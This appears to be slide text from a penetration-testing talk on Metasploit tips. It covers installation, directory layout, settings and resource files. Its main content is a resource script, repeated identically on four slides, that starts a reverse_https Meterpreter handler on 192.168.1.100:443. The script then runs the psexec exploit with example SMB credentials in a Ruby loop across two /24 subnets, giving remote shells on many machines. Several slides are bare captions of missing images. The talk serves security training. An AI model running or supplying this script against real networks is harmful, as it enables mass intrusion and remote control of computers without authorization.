1. Metasploit Magic
A little sleight of hand

2. But first...

3. Installing Metasploit
svn co https://metasploit.com/svn/trunk msf

4. not.. here

5. ESPECIALLY not here

6. it is a SYN

7. SRSLY!

8. here is ok ;-)

9. and remember...
this isn’t the only place you can install it...

10. Directory Structure
HACKING
msfd
msfrpcd
documentation
msfmachscan
psexec.rc
msfconsole
msfrpc
armitage
msfgui
plugins
data
msfpescan
scripts
msfcli
tools
README
msfencode
bins
modules
msfpayload
external
msfelfscan
msfupdate
lib
msfopcode

11. ~/.msf3/
• history, logs, loot
• msfconsole.rc
• YOUR SETTINGS
• modules
• YOUR MODULES

12. resource files
line by line script
can understand ruby
for meterpreter sessions now!
./msfconsole -r psexec.rc
msf> resource psexec.rc

13. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner

14. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner

15. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner

16. use multi/handler
setg PAYLOAD windows/meterpreter/reverse_https
setg LHOST 192.168.1.100
setg LPORT 443
set ExitOnSession false
exploit -j -z
!
use windows/smb/psexec
set SMBUser AdminBob
set SMBPass ThisPasswordSucks
set SMBDomain .
set DisablePayloadHandler true
!
<ruby>
!
require 'rex/socket/range_walker'
!
rhosts = '10.10.10.0/24,10.10.14.0/24'
!
iplist = Rex::Socket::RangeWalker.new(rhosts)
iplist.each do |rhost|
self.run_single("set RHOST #{rhost}")
self.run_single("exploit -j -z")
end
</ruby>
!
psexec scanner

17. magic
• user .*psexec

18. other fun...
• script
• color = false
• screen

19. meterpreter>guid
• twitter.com/mubix
• mubix[hak5.org]